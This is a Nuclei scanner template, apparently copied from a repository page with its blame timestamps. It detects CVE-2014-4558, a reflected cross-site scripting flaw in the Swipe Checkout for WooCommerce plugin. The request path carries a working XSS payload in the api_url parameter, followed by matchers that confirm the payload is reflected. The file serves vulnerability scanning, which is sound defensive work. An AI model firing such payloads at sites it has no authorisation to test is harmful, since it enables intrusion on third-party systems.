my-nuclei-templates/CVE-2014-4558.yaml

41 lines
1.3 KiB
YAML
Raw Permalink Normal View History

2021-11-09 22:49:13 +00:00
id: CVE-2014-4558
info:
2022-06-18 08:05:25 +00:00
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting
2021-11-09 22:49:13 +00:00
author: daffainfo
severity: medium
2022-06-18 08:05:25 +00:00
description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
reference:
2021-11-09 22:49:13 +00:00
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
2022-06-18 08:05:25 +00:00
- http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss
2021-11-09 22:49:13 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-11-09 22:49:13 +00:00
cve-id: CVE-2014-4558
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2014,wordpress,wp-plugin,xss,woocommerce
2021-11-09 22:49:13 +00:00
requests:
- method: GET
path:
2022-06-18 08:05:25 +00:00
- "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
2021-11-09 22:49:13 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
2022-06-18 08:05:25 +00:00
- 200
# Enhanced by mp on 2022/02/24